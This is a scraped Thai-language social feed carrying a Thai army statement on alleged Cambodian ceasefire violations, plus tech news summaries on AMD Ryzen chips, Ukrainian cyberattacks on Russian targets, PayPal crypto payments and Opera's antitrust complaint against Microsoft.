https://www.techradar.com/health-fitness/smartwatches/the-all-new-pebble-watches-just-got-a-new-name-and-release-date-heres-how-to-get-one
    0 ความคิดเห็น 0 การแบ่งปัน 121 มุมมอง 0 รีวิว
  • กัมพูชาไม่สนหยุดยิง ไทยพร้อมโต้ขั้นเด็ดขาด : [THE MESSAGE]

    พลตรี วินธัย สุวารี โฆษกกองทัพบก อ่านแถลงการณ์กองทัพบก เรื่องการละเมิดข้อตกลงหยุดยิงโดยกองทัพกัมพูชา ระบุ ตามที่รัฐบาลไทย​และกัมพูชา​ ตกลงประกาศหยุดยิง มีผลตั้งแต่ 24.00 น.ของวันที่ 28 กรกฎาคม 2568​ ฝ่ายไทยปฏิบัติตามอย่างเคร่งครัด อย่างไรก็ตาม ได้รับรายงานจากหน่วยในพื้นที่ว่า ตลอดทั้งคืนถึงเช้ามืด กองทัพกัมพูชาละเมิดข้อตกลงหยุดยิงอีกครั้ง โดย 1.พื้นที่คานม้า กัมพูชาใช้อาวุธปืนเล็กยิงใส่แนวกำลังฝ่ายไทย 2.พื้นที่เขาพระวิหาร บริเวณภูมะเขือ กัมพูชาใช้อาวุธปืนเล็ก ยิงอย่างต่อเนื่อง ใช้เครื่องยิงลูกระเบิด ฝ่ายไทยจำเป็นต้องตอบโต้ เพื่อป้องกันตนเอง 3.พื้นที่ผามออีแดง ตรวจพบ​การยิงเครื่องยิงลูกระเบิด จากฝั่งกัมพูชาเข้ามาในเขตไทยอย่างชัดเจน เป็นการละเมิดข้อตกลงหยุดยิงอย่างร้ายแรง ครั้งที่ 2 สะท้อนถึงพฤติกรรมไม่เคารพพันธะกรณีระหว่างประเทศ ส่งผลกระทบต่อความไว้วางใจระหว่าง 2 ประเทศ กองทัพบกประณามการกระทำอันไม่รับผิดชอบของกองทัพกัมพูชา​อย่างถึงที่สุด ฝ่ายไทยจะยังอดทนอดกลั้น ยึดหลักสันติภาพและมนุษยธรรมสูงสุด และจะดำเนินการตามขั้นตอนที่เหมาะสมจำเป็นอย่างเด็ดขาด เพื่อปกป้องอธิปไตยและความปลอดภัยของประชาชนไทยโดยไม่ละเว้น​
    กัมพูชาไม่สนหยุดยิง ไทยพร้อมโต้ขั้นเด็ดขาด : [THE MESSAGE] พลตรี วินธัย สุวารี โฆษกกองทัพบก อ่านแถลงการณ์กองทัพบก เรื่องการละเมิดข้อตกลงหยุดยิงโดยกองทัพกัมพูชา ระบุ ตามที่รัฐบาลไทย​และกัมพูชา​ ตกลงประกาศหยุดยิง มีผลตั้งแต่ 24.00 น.ของวันที่ 28 กรกฎาคม 2568​ ฝ่ายไทยปฏิบัติตามอย่างเคร่งครัด อย่างไรก็ตาม ได้รับรายงานจากหน่วยในพื้นที่ว่า ตลอดทั้งคืนถึงเช้ามืด กองทัพกัมพูชาละเมิดข้อตกลงหยุดยิงอีกครั้ง โดย 1.พื้นที่คานม้า กัมพูชาใช้อาวุธปืนเล็กยิงใส่แนวกำลังฝ่ายไทย 2.พื้นที่เขาพระวิหาร บริเวณภูมะเขือ กัมพูชาใช้อาวุธปืนเล็ก ยิงอย่างต่อเนื่อง ใช้เครื่องยิงลูกระเบิด ฝ่ายไทยจำเป็นต้องตอบโต้ เพื่อป้องกันตนเอง 3.พื้นที่ผามออีแดง ตรวจพบ​การยิงเครื่องยิงลูกระเบิด จากฝั่งกัมพูชาเข้ามาในเขตไทยอย่างชัดเจน เป็นการละเมิดข้อตกลงหยุดยิงอย่างร้ายแรง ครั้งที่ 2 สะท้อนถึงพฤติกรรมไม่เคารพพันธะกรณีระหว่างประเทศ ส่งผลกระทบต่อความไว้วางใจระหว่าง 2 ประเทศ กองทัพบกประณามการกระทำอันไม่รับผิดชอบของกองทัพกัมพูชา​อย่างถึงที่สุด ฝ่ายไทยจะยังอดทนอดกลั้น ยึดหลักสันติภาพและมนุษยธรรมสูงสุด และจะดำเนินการตามขั้นตอนที่เหมาะสมจำเป็นอย่างเด็ดขาด เพื่อปกป้องอธิปไตยและความปลอดภัยของประชาชนไทยโดยไม่ละเว้น​
    Like
    4
    0 ความคิดเห็น 0 การแบ่งปัน 284 มุมมอง 0 0 รีวิว
  • สรุปสั้น กันงง
    เหตุการณ์การละเมิดการหยุดยิงของกัมพูชา
    30 กรกฎาคม 2568
    • พื้นที่ช่องอานม้า : พบการเติมกำลัง การใช้โดรน ตรวจการณ์ และการยิงตรวจแนว
    • พื้นที่เขาพระวิหาร (ภูมะเขือ ห้วยตามาเรีย ช่องคานม้า) พบการใช้ปืนเล็กและเครื่องยิงลูกระเบิดจนถึงเช้า
    • พื้นที่ผามออีแดง : พบการยิงเครื่องยิงลูกระเบิดมาตก ใกล้ฐานฯ ไทยไม่ได้ตอบโต้
    #TruthFromThailand
    #กัมพูชายิงก่อน
    #CambodiaOpenedFire
    #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด
    #กองทัพบกทันกระแส
    สรุปสั้น กันงง เหตุการณ์การละเมิดการหยุดยิงของกัมพูชา 30 กรกฎาคม 2568 • พื้นที่ช่องอานม้า : พบการเติมกำลัง การใช้โดรน ตรวจการณ์ และการยิงตรวจแนว • พื้นที่เขาพระวิหาร (ภูมะเขือ ห้วยตามาเรีย ช่องคานม้า) พบการใช้ปืนเล็กและเครื่องยิงลูกระเบิดจนถึงเช้า • พื้นที่ผามออีแดง : พบการยิงเครื่องยิงลูกระเบิดมาตก ใกล้ฐานฯ ไทยไม่ได้ตอบโต้ #TruthFromThailand #กัมพูชายิงก่อน #CambodiaOpenedFire #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #กองทัพบกทันกระแส
    0 ความคิดเห็น 0 การแบ่งปัน 85 มุมมอง 0 รีวิว
  • เรื่องเล่าจากห้องแล็บ: เมื่อ AMD ส่งชิป “PRO” และ “F” ลงตลาดเพื่อจับกลุ่มใหม่

    ในช่วงปลายเดือนกรกฎาคม 2025 มีข้อมูลหลุดจากเว็บไซต์ ASUS ที่เผยให้เห็นว่า AMD เตรียมเปิดตัวซีพียูรุ่นใหม่ในตระกูล Ryzen 9000 ได้แก่:

    Ryzen 7 9700F: เป็นรุ่นแรกในซีรีส์ Zen 5 ที่ไม่มี iGPU (กราฟิกในตัว) โดยมีสเปกใกล้เคียงกับ 9700X คือ 8 คอร์ 16 เธรด, L3 cache 32MB, base clock 3.8GHz และ TDP 65W เหมาะสำหรับผู้ใช้ที่มีการ์ดจอแยกอยู่แล้ว

    Ryzen PRO 9000 Series: เป็นซีพียูสำหรับองค์กรขนาดเล็กหรือเวิร์กสเตชันระดับเริ่มต้น โดยมี 3 รุ่นย่อย:
    - PRO 9 9945: 12 คอร์ 24 เธรด, base clock 3.4GHz, L3 cache 64MB
    - PRO 7 9745: 8 คอร์ 16 เธรด, base clock 3.8GHz, L3 cache 32MB
    - PRO 5 9645: 6 คอร์ 12 เธรด, base clock 3.9GHz, L3 cache 32MB

    ทั้งหมดมี TDP 65W และใช้สถาปัตยกรรม Granite Ridge (Zen 5) เหมือนกับรุ่นคอนซูเมอร์ แต่เน้นความเสถียรและการจัดการสำหรับองค์กร

    Ryzen 7 9700F เป็นซีพียู Zen 5 รุ่นแรกที่ไม่มี iGPU
    ต้องใช้การ์ดจอแยกในการแสดงผล
    สเปกใกล้เคียงกับ 9700X แต่ราคาถูกกว่า

    PRO 9000 Series เป็นรุ่นสำหรับองค์กรขนาดเล็ก
    มี 3 รุ่นย่อย: PRO 9 9945, PRO 7 9745, PRO 5 9645
    ใช้สเปกใกล้เคียงกับรุ่นคอนซูเมอร์แต่เน้นความเสถียร

    PRO 9 9945 มีสเปกเท่ากับ Ryzen 9 9900X แต่ clock ต่ำกว่า
    ลด TDP จาก 120W เหลือ 65W เพื่อความประหยัดพลังงาน
    เหมาะกับองค์กรที่ต้องการประสิทธิภาพแต่ควบคุมความร้อน

    PRO 7 9745 มีสเปกเหมือนกับ Ryzen 7 9700F
    เหมาะสำหรับเวิร์กสเตชันระดับกลาง
    ใช้ได้กับเมนบอร์ด AM5 ที่รองรับ Zen 5

    PRO 5 9645 ใกล้เคียงกับ Ryzen 5 9600X
    ยังไม่มีข้อมูล boost clock
    เหมาะสำหรับงานทั่วไปในองค์กร

    https://wccftech.com/amd-prepares-granite-ridge-pro-chips-and-ryzen-7-9700f-for-consumers-as-spotted-on-asus-website-core-clock-cache-and-tdp-leaked/
    🎙️ เรื่องเล่าจากห้องแล็บ: เมื่อ AMD ส่งชิป “PRO” และ “F” ลงตลาดเพื่อจับกลุ่มใหม่ ในช่วงปลายเดือนกรกฎาคม 2025 มีข้อมูลหลุดจากเว็บไซต์ ASUS ที่เผยให้เห็นว่า AMD เตรียมเปิดตัวซีพียูรุ่นใหม่ในตระกูล Ryzen 9000 ได้แก่: ➡️ Ryzen 7 9700F: เป็นรุ่นแรกในซีรีส์ Zen 5 ที่ไม่มี iGPU (กราฟิกในตัว) โดยมีสเปกใกล้เคียงกับ 9700X คือ 8 คอร์ 16 เธรด, L3 cache 32MB, base clock 3.8GHz และ TDP 65W เหมาะสำหรับผู้ใช้ที่มีการ์ดจอแยกอยู่แล้ว ➡️ Ryzen PRO 9000 Series: เป็นซีพียูสำหรับองค์กรขนาดเล็กหรือเวิร์กสเตชันระดับเริ่มต้น โดยมี 3 รุ่นย่อย: - PRO 9 9945: 12 คอร์ 24 เธรด, base clock 3.4GHz, L3 cache 64MB - PRO 7 9745: 8 คอร์ 16 เธรด, base clock 3.8GHz, L3 cache 32MB - PRO 5 9645: 6 คอร์ 12 เธรด, base clock 3.9GHz, L3 cache 32MB ทั้งหมดมี TDP 65W และใช้สถาปัตยกรรม Granite Ridge (Zen 5) เหมือนกับรุ่นคอนซูเมอร์ แต่เน้นความเสถียรและการจัดการสำหรับองค์กร ✅ Ryzen 7 9700F เป็นซีพียู Zen 5 รุ่นแรกที่ไม่มี iGPU ➡️ ต้องใช้การ์ดจอแยกในการแสดงผล ➡️ สเปกใกล้เคียงกับ 9700X แต่ราคาถูกกว่า ✅ PRO 9000 Series เป็นรุ่นสำหรับองค์กรขนาดเล็ก ➡️ มี 3 รุ่นย่อย: PRO 9 9945, PRO 7 9745, PRO 5 9645 ➡️ ใช้สเปกใกล้เคียงกับรุ่นคอนซูเมอร์แต่เน้นความเสถียร ✅ PRO 9 9945 มีสเปกเท่ากับ Ryzen 9 9900X แต่ clock ต่ำกว่า ➡️ ลด TDP จาก 120W เหลือ 65W เพื่อความประหยัดพลังงาน ➡️ เหมาะกับองค์กรที่ต้องการประสิทธิภาพแต่ควบคุมความร้อน ✅ PRO 7 9745 มีสเปกเหมือนกับ Ryzen 7 9700F ➡️ เหมาะสำหรับเวิร์กสเตชันระดับกลาง ➡️ ใช้ได้กับเมนบอร์ด AM5 ที่รองรับ Zen 5 ✅ PRO 5 9645 ใกล้เคียงกับ Ryzen 5 9600X ➡️ ยังไม่มีข้อมูล boost clock ➡️ เหมาะสำหรับงานทั่วไปในองค์กร https://wccftech.com/amd-prepares-granite-ridge-pro-chips-and-ryzen-7-9700f-for-consumers-as-spotted-on-asus-website-core-clock-cache-and-tdp-leaked/
    WCCFTECH.COM
    AMD Prepares Granite Ridge PRO Chips And Ryzen 7 9700F For Consumers As Spotted On ASUS Website; Core Clock, Cache, And TDP Leaked
    AMD is reportedly preparing more Ryzen 9000 series processors, including the PRO variants for enterprises and the Ryzen 7 9700F without an iGPU.
    0 ความคิดเห็น 0 การแบ่งปัน 102 มุมมอง 0 รีวิว
  • เรื่องเล่าจากแนวรบไซเบอร์: เมื่อยูเครนโจมตีรัสเซียด้วยข้อมูลแทนกระสุน

    ในช่วงปลายเดือนกรกฎาคม 2025 ยูเครนได้เปิดปฏิบัติการไซเบอร์สองแนวพร้อมกัน:

    1️⃣ การโจมตีแหลมไครเมีย หน่วยข่าวกรองทหารยูเครน (HUR) เปิดปฏิบัติการพิเศษด้วยการโจมตีแบบ DDoS (Distributed Denial-of-Service) ใส่ระบบสารสนเทศของหน่วยงานปกครองรัสเซียในไครเมีย ส่งผลให้ระบบเครือข่ายและข้อมูลของรัฐบาลท้องถิ่นเป็นอัมพาต พร้อมกับการขโมยข้อมูลกว่า 100TB ก่อนลบข้อมูลทั้งหมดออกจากเซิร์ฟเวอร์

    2️⃣ การโจมตีสายการบิน Aeroflot กลุ่มแฮกเกอร์ Silent Crow และ Belarusian Cyber Partisans อ้างว่าได้แทรกซึมระบบของ Aeroflot มานานกว่า 1 ปี ก่อนจะทำลายเซิร์ฟเวอร์กว่า 7,000 เครื่อง ทำให้ต้องยกเลิกเที่ยวบินกว่า 100 เที่ยว และเว็บไซต์ของบริษัทใช้งานไม่ได้3

    ทั้งสองปฏิบัติการนี้เกิดขึ้นหลังจากยูเครนร่วมมือกับกลุ่ม BO Team และ Ukrainian Cyber Alliance โจมตีบริษัท Gaskar Group ผู้ผลิตโดรนรายใหญ่ของรัสเซีย ทำลายข้อมูลกว่า 47TB และทำให้การผลิตโดรนหยุดชะงัก

    ยูเครนโจมตีไซเบอร์ใส่หน่วยงานรัสเซียในแหลมไครเมีย
    ใช้ DDoS ทำให้ระบบเครือข่ายของรัฐบาลท้องถิ่นเป็นอัมพาต
    ขโมยข้อมูลกว่า 100TB ก่อนลบออกจากเซิร์ฟเวอร์ทั้งหมด

    สายการบิน Aeroflot ถูกโจมตีโดย Silent Crow และ Cyber Partisans
    ทำลายเซิร์ฟเวอร์กว่า 7,000 เครื่อง และระบบ IT ทั้งหมดของบริษัท3
    ยกเลิกเที่ยวบินกว่า 100 เที่ยว และเว็บไซต์ใช้งานไม่ได้

    กลุ่มแฮกเกอร์ Silent Crow แทรกซึมระบบ Aeroflot มานานกว่า 1 ปี
    ขโมยข้อมูลผู้โดยสาร, อีเมลภายใน, และไฟล์เสียงการสื่อสาร6
    ขู่ว่าจะเปิดเผยข้อมูลส่วนตัวของผู้โดยสารทั้งหมดในอนาคต

    การโจมตี Gaskar Group ทำให้การผลิตโดรนของรัสเซียหยุดชะงัก
    ข้อมูลการออกแบบโดรนและซอร์สโค้ดถูกขโมยและส่งให้กองทัพยูเครน5
    ระบบบัญชี, การผลิต และอินเทอร์เน็ตของบริษัทถูกทำลาย

    ยูเครนใช้ไซเบอร์เป็นยุทธศาสตร์หลักในการทำสงคราม
    มุ่งโจมตีโครงสร้างพื้นฐานของรัสเซียแทนการปะทะโดยตรง
    สร้างความเสียหายเชิงยุทธศาสตร์โดยไม่ต้องใช้ระเบิด

    การโจมตีไซเบอร์อาจส่งผลกระทบต่อพลเรือนและข้อมูลส่วนบุคคล
    ข้อมูลผู้โดยสาร Aeroflot ถูกขโมยและอาจถูกเปิดเผยสาธารณะ3
    เสี่ยงต่อการละเมิดสิทธิส่วนบุคคลและความปลอดภัยของประชาชน

    การโจมตีโครงสร้างพื้นฐานอาจนำไปสู่การตอบโต้ที่รุนแรงจากรัสเซีย
    รัสเซียอาจเพิ่มมาตรการตอบโต้ทางไซเบอร์หรือทางทหาร
    เสี่ยงต่อการขยายความขัดแย้งไปยังประเทศพันธมิตร

    การใช้ DDoS เป็นเครื่องมือเบี่ยงเบนความสนใจอาจทำให้การป้องกันล่าช้า
    องค์กรอาจไม่ทันสังเกตการโจมตีหลักที่เกิดขึ้นพร้อมกัน
    ต้องใช้ทรัพยากรเพิ่มในการตรวจสอบและป้องกันหลายแนวทาง

    การโจมตีแบบทำลายข้อมูลอาจทำให้การฟื้นฟูระบบเป็นไปได้ยาก
    Aeroflot และ Gaskar อาจต้องใช้เวลาหลายเดือนในการกู้คืนระบบ
    หากไม่มีสำรองข้อมูลแบบออฟไลน์ อาจสูญเสียข้อมูลถาวร

    https://www.tomshardware.com/tech-industry/cyber-security/ukraine-strikes-back-at-russia-launches-cyberattack-on-forces-in-crimea-as-independent-hackers-target-airline-aeroflot-grounding-dozens-of-planes
    🎙️ เรื่องเล่าจากแนวรบไซเบอร์: เมื่อยูเครนโจมตีรัสเซียด้วยข้อมูลแทนกระสุน ในช่วงปลายเดือนกรกฎาคม 2025 ยูเครนได้เปิดปฏิบัติการไซเบอร์สองแนวพร้อมกัน: 1️⃣ การโจมตีแหลมไครเมีย หน่วยข่าวกรองทหารยูเครน (HUR) เปิดปฏิบัติการพิเศษด้วยการโจมตีแบบ DDoS (Distributed Denial-of-Service) ใส่ระบบสารสนเทศของหน่วยงานปกครองรัสเซียในไครเมีย ส่งผลให้ระบบเครือข่ายและข้อมูลของรัฐบาลท้องถิ่นเป็นอัมพาต พร้อมกับการขโมยข้อมูลกว่า 100TB ก่อนลบข้อมูลทั้งหมดออกจากเซิร์ฟเวอร์ 2️⃣ การโจมตีสายการบิน Aeroflot กลุ่มแฮกเกอร์ Silent Crow และ Belarusian Cyber Partisans อ้างว่าได้แทรกซึมระบบของ Aeroflot มานานกว่า 1 ปี ก่อนจะทำลายเซิร์ฟเวอร์กว่า 7,000 เครื่อง ทำให้ต้องยกเลิกเที่ยวบินกว่า 100 เที่ยว และเว็บไซต์ของบริษัทใช้งานไม่ได้3 ทั้งสองปฏิบัติการนี้เกิดขึ้นหลังจากยูเครนร่วมมือกับกลุ่ม BO Team และ Ukrainian Cyber Alliance โจมตีบริษัท Gaskar Group ผู้ผลิตโดรนรายใหญ่ของรัสเซีย ทำลายข้อมูลกว่า 47TB และทำให้การผลิตโดรนหยุดชะงัก ✅ ยูเครนโจมตีไซเบอร์ใส่หน่วยงานรัสเซียในแหลมไครเมีย ➡️ ใช้ DDoS ทำให้ระบบเครือข่ายของรัฐบาลท้องถิ่นเป็นอัมพาต ➡️ ขโมยข้อมูลกว่า 100TB ก่อนลบออกจากเซิร์ฟเวอร์ทั้งหมด ✅ สายการบิน Aeroflot ถูกโจมตีโดย Silent Crow และ Cyber Partisans ➡️ ทำลายเซิร์ฟเวอร์กว่า 7,000 เครื่อง และระบบ IT ทั้งหมดของบริษัท3 ➡️ ยกเลิกเที่ยวบินกว่า 100 เที่ยว และเว็บไซต์ใช้งานไม่ได้ ✅ กลุ่มแฮกเกอร์ Silent Crow แทรกซึมระบบ Aeroflot มานานกว่า 1 ปี ➡️ ขโมยข้อมูลผู้โดยสาร, อีเมลภายใน, และไฟล์เสียงการสื่อสาร6 ➡️ ขู่ว่าจะเปิดเผยข้อมูลส่วนตัวของผู้โดยสารทั้งหมดในอนาคต ✅ การโจมตี Gaskar Group ทำให้การผลิตโดรนของรัสเซียหยุดชะงัก ➡️ ข้อมูลการออกแบบโดรนและซอร์สโค้ดถูกขโมยและส่งให้กองทัพยูเครน5 ➡️ ระบบบัญชี, การผลิต และอินเทอร์เน็ตของบริษัทถูกทำลาย ✅ ยูเครนใช้ไซเบอร์เป็นยุทธศาสตร์หลักในการทำสงคราม ➡️ มุ่งโจมตีโครงสร้างพื้นฐานของรัสเซียแทนการปะทะโดยตรง ➡️ สร้างความเสียหายเชิงยุทธศาสตร์โดยไม่ต้องใช้ระเบิด ‼️ การโจมตีไซเบอร์อาจส่งผลกระทบต่อพลเรือนและข้อมูลส่วนบุคคล ⛔ ข้อมูลผู้โดยสาร Aeroflot ถูกขโมยและอาจถูกเปิดเผยสาธารณะ3 ⛔ เสี่ยงต่อการละเมิดสิทธิส่วนบุคคลและความปลอดภัยของประชาชน ‼️ การโจมตีโครงสร้างพื้นฐานอาจนำไปสู่การตอบโต้ที่รุนแรงจากรัสเซีย ⛔ รัสเซียอาจเพิ่มมาตรการตอบโต้ทางไซเบอร์หรือทางทหาร ⛔ เสี่ยงต่อการขยายความขัดแย้งไปยังประเทศพันธมิตร ‼️ การใช้ DDoS เป็นเครื่องมือเบี่ยงเบนความสนใจอาจทำให้การป้องกันล่าช้า ⛔ องค์กรอาจไม่ทันสังเกตการโจมตีหลักที่เกิดขึ้นพร้อมกัน ⛔ ต้องใช้ทรัพยากรเพิ่มในการตรวจสอบและป้องกันหลายแนวทาง ‼️ การโจมตีแบบทำลายข้อมูลอาจทำให้การฟื้นฟูระบบเป็นไปได้ยาก ⛔ Aeroflot และ Gaskar อาจต้องใช้เวลาหลายเดือนในการกู้คืนระบบ ⛔ หากไม่มีสำรองข้อมูลแบบออฟไลน์ อาจสูญเสียข้อมูลถาวร https://www.tomshardware.com/tech-industry/cyber-security/ukraine-strikes-back-at-russia-launches-cyberattack-on-forces-in-crimea-as-independent-hackers-target-airline-aeroflot-grounding-dozens-of-planes
    WWW.TOMSHARDWARE.COM
    Ukraine strikes back at Russia — launches cyberattack on forces in Crimea as independent hackers target airline Aeroflot, grounding dozens of planes
    The first was a sustained distributed denial-of-service attack on Crimean forces; the second was reportedly destructive.
    0 ความคิดเห็น 0 การแบ่งปัน 192 มุมมอง 0 รีวิว
  • เรื่องเล่าจากกระเป๋าเงินดิจิทัล: เมื่อ PayPal เชื่อมโลกคริปโตสู่การค้าจริง

    ในช่วงสัปดาห์สุดท้ายของเดือนกรกฎาคม 2025 PayPal ประกาศเปิดตัวฟีเจอร์ “Pay with Crypto” ที่จะให้ร้านค้าในสหรัฐฯ รับชำระเงินด้วยคริปโตมากกว่า 100 สกุลเงินดิจิทัล เช่น BTC, ETH, XRP, USDT, USDC และ SOL โดยผู้ใช้สามารถเชื่อมต่อกระเป๋าเงินจากแพลตฟอร์มยอดนิยม เช่น Coinbase, MetaMask, OKX และ Binance ได้โดยตรง

    ธุรกรรมจะถูกแปลงเป็นเงินดอลลาร์สหรัฐหรือ stablecoin PYUSD ทันทีที่ชำระเงิน ทำให้ร้านค้าได้รับเงินอย่างรวดเร็วและลดความเสี่ยงจากความผันผวนของคริปโต ขณะเดียวกัน PayPal เสนออัตราดอกเบี้ย 4% ต่อปีสำหรับยอดเงิน PYUSD ที่เก็บไว้ในระบบ เพื่อกระตุ้นการใช้งานและถือครอง

    PayPal เปิดตัวฟีเจอร์ “Pay with Crypto” ให้ร้านค้าในสหรัฐฯ รับชำระเงินด้วยคริปโตมากกว่า 100 สกุล
    รองรับ BTC, ETH, XRP, USDT, USDC, BNB, SOL และอื่นๆ
    เชื่อมต่อกับกระเป๋าเงินยอดนิยม เช่น Coinbase, MetaMask, OKX, Binance

    ธุรกรรมจะถูกแปลงเป็นเงินดอลลาร์หรือ PYUSD ทันทีที่ชำระเงิน
    ลดความเสี่ยงจากความผันผวนของคริปโต
    ช่วยให้ร้านค้าได้รับเงินเร็วขึ้นและจัดการบัญชีง่ายขึ้น

    ค่าธรรมเนียมธุรกรรมเริ่มต้นที่ 0.99% และอาจเพิ่มเป็น 1.5% หลังปีแรก
    ต่ำกว่าค่าธรรมเนียมบัตรเครดิตระหว่างประเทศที่เฉลี่ย 1.57%
    ลดต้นทุนการรับชำระเงินจากลูกค้าต่างประเทศได้ถึง 90%

    ร้านค้าที่ถือ PYUSD บน PayPal จะได้รับดอกเบี้ย 4% ต่อปี
    เป็นแรงจูงใจให้ถือครอง stablecoin ของ PayPal
    PYUSD ถูกออกแบบให้มีมูลค่าคงที่ 1:1 กับดอลลาร์สหรัฐ และออกโดย Paxos Trust Company

    ฟีเจอร์นี้เป็นส่วนหนึ่งของกลยุทธ์เชื่อมโลกการเงินดั้งเดิมกับ Web3
    PayPal มีผู้ใช้งานกว่า 650 ล้านรายทั่วโลก
    เป็นการเปิดประตูสู่เศรษฐกิจคริปโตมูลค่า $3.9 ล้านล้านดอลลาร์

    ผู้ซื้อจากต่างประเทศอาจต้องจ่ายค่าธรรมเนียมสูงถึง 10% ต่อธุรกรรม
    อาจทำให้ลูกค้าต่างประเทศลังเลที่จะใช้คริปโตในการซื้อสินค้า
    ส่งผลต่อยอดขายของร้านค้าที่เน้นตลาดต่างประเทศ

    การถือครอง PYUSD มีความเสี่ยงด้านกฎระเบียบและการรับประกัน
    PYUSD ไม่ได้รับการคุ้มครองจาก FDIC หรือ SIPC
    หากเกิดการโจรกรรมหรือระบบล่ม ผู้ใช้ต้องรับผิดชอบเอง

    การแปลงคริปโตเป็น fiat ผ่านระบบกลางอาจขัดกับหลักการกระจายอำนาจ
    ผู้ใช้ต้องพึ่งพา PayPal ในการแปลงและจัดการธุรกรรม
    อาจไม่เหมาะกับผู้ใช้ที่ต้องการควบคุมสินทรัพย์แบบเต็มรูปแบบ

    การถือครอง PYUSD เพื่อรับดอกเบี้ยอาจถูกตีความว่าเป็นการลงทุน
    อาจเข้าข่ายหลักทรัพย์ตามกฎหมายบางประเทศ
    เสี่ยงต่อการถูกตรวจสอบหรือจำกัดการใช้งานในอนาคต

    https://www.techspot.com/news/108847-paypal-us-merchants-accept-over-100-cryptocurrencies-including.html
    💸 เรื่องเล่าจากกระเป๋าเงินดิจิทัล: เมื่อ PayPal เชื่อมโลกคริปโตสู่การค้าจริง ในช่วงสัปดาห์สุดท้ายของเดือนกรกฎาคม 2025 PayPal ประกาศเปิดตัวฟีเจอร์ “Pay with Crypto” ที่จะให้ร้านค้าในสหรัฐฯ รับชำระเงินด้วยคริปโตมากกว่า 100 สกุลเงินดิจิทัล เช่น BTC, ETH, XRP, USDT, USDC และ SOL โดยผู้ใช้สามารถเชื่อมต่อกระเป๋าเงินจากแพลตฟอร์มยอดนิยม เช่น Coinbase, MetaMask, OKX และ Binance ได้โดยตรง ธุรกรรมจะถูกแปลงเป็นเงินดอลลาร์สหรัฐหรือ stablecoin PYUSD ทันทีที่ชำระเงิน ทำให้ร้านค้าได้รับเงินอย่างรวดเร็วและลดความเสี่ยงจากความผันผวนของคริปโต ขณะเดียวกัน PayPal เสนออัตราดอกเบี้ย 4% ต่อปีสำหรับยอดเงิน PYUSD ที่เก็บไว้ในระบบ เพื่อกระตุ้นการใช้งานและถือครอง ✅ PayPal เปิดตัวฟีเจอร์ “Pay with Crypto” ให้ร้านค้าในสหรัฐฯ รับชำระเงินด้วยคริปโตมากกว่า 100 สกุล ➡️ รองรับ BTC, ETH, XRP, USDT, USDC, BNB, SOL และอื่นๆ ➡️ เชื่อมต่อกับกระเป๋าเงินยอดนิยม เช่น Coinbase, MetaMask, OKX, Binance ✅ ธุรกรรมจะถูกแปลงเป็นเงินดอลลาร์หรือ PYUSD ทันทีที่ชำระเงิน ➡️ ลดความเสี่ยงจากความผันผวนของคริปโต ➡️ ช่วยให้ร้านค้าได้รับเงินเร็วขึ้นและจัดการบัญชีง่ายขึ้น ✅ ค่าธรรมเนียมธุรกรรมเริ่มต้นที่ 0.99% และอาจเพิ่มเป็น 1.5% หลังปีแรก ➡️ ต่ำกว่าค่าธรรมเนียมบัตรเครดิตระหว่างประเทศที่เฉลี่ย 1.57% ➡️ ลดต้นทุนการรับชำระเงินจากลูกค้าต่างประเทศได้ถึง 90% ✅ ร้านค้าที่ถือ PYUSD บน PayPal จะได้รับดอกเบี้ย 4% ต่อปี ➡️ เป็นแรงจูงใจให้ถือครอง stablecoin ของ PayPal ➡️ PYUSD ถูกออกแบบให้มีมูลค่าคงที่ 1:1 กับดอลลาร์สหรัฐ และออกโดย Paxos Trust Company ✅ ฟีเจอร์นี้เป็นส่วนหนึ่งของกลยุทธ์เชื่อมโลกการเงินดั้งเดิมกับ Web3 ➡️ PayPal มีผู้ใช้งานกว่า 650 ล้านรายทั่วโลก ➡️ เป็นการเปิดประตูสู่เศรษฐกิจคริปโตมูลค่า $3.9 ล้านล้านดอลลาร์ ‼️ ผู้ซื้อจากต่างประเทศอาจต้องจ่ายค่าธรรมเนียมสูงถึง 10% ต่อธุรกรรม ⛔ อาจทำให้ลูกค้าต่างประเทศลังเลที่จะใช้คริปโตในการซื้อสินค้า ⛔ ส่งผลต่อยอดขายของร้านค้าที่เน้นตลาดต่างประเทศ ‼️ การถือครอง PYUSD มีความเสี่ยงด้านกฎระเบียบและการรับประกัน ⛔ PYUSD ไม่ได้รับการคุ้มครองจาก FDIC หรือ SIPC ⛔ หากเกิดการโจรกรรมหรือระบบล่ม ผู้ใช้ต้องรับผิดชอบเอง ‼️ การแปลงคริปโตเป็น fiat ผ่านระบบกลางอาจขัดกับหลักการกระจายอำนาจ ⛔ ผู้ใช้ต้องพึ่งพา PayPal ในการแปลงและจัดการธุรกรรม ⛔ อาจไม่เหมาะกับผู้ใช้ที่ต้องการควบคุมสินทรัพย์แบบเต็มรูปแบบ ‼️ การถือครอง PYUSD เพื่อรับดอกเบี้ยอาจถูกตีความว่าเป็นการลงทุน ⛔ อาจเข้าข่ายหลักทรัพย์ตามกฎหมายบางประเทศ ⛔ เสี่ยงต่อการถูกตรวจสอบหรือจำกัดการใช้งานในอนาคต https://www.techspot.com/news/108847-paypal-us-merchants-accept-over-100-cryptocurrencies-including.html
    WWW.TECHSPOT.COM
    PayPal to let US merchants accept over 100 cryptocurrencies, including Bitcoin and Ethereum
    Over the next few weeks, PayPal will roll out a new "Pay with Crypto" option. The feature will reportedly allow businesses worldwide to accept more than 100...
    0 ความคิดเห็น 0 การแบ่งปัน 138 มุมมอง 0 รีวิว
  • เรื่องเล่าจากเบราว์เซอร์: เมื่อ Opera ลุกขึ้นสู้กับ Edge เพื่อความเป็นธรรมในการแข่งขัน

    ในเดือนกรกฎาคม 2025 Opera ได้ยื่นคำร้องต่อ CADE (หน่วยงานกำกับดูแลการแข่งขันของบราซิล) โดยกล่าวหาว่า Microsoft ใช้ “กลยุทธ์การออกแบบที่ชักจูง” หรือที่เรียกว่า dark patterns เพื่อผลักดันให้ผู้ใช้ Windows ใช้ Edge เป็นเบราว์เซอร์หลัก ทั้งที่ผู้ใช้ตั้งค่าเบราว์เซอร์อื่นไว้แล้ว

    Opera ระบุว่า Microsoft:
    - ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์ (OEMs) เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น
    - ไม่เปิดโอกาสให้เบราว์เซอร์อื่น เช่น Opera ได้รับการติดตั้งล่วงหน้า
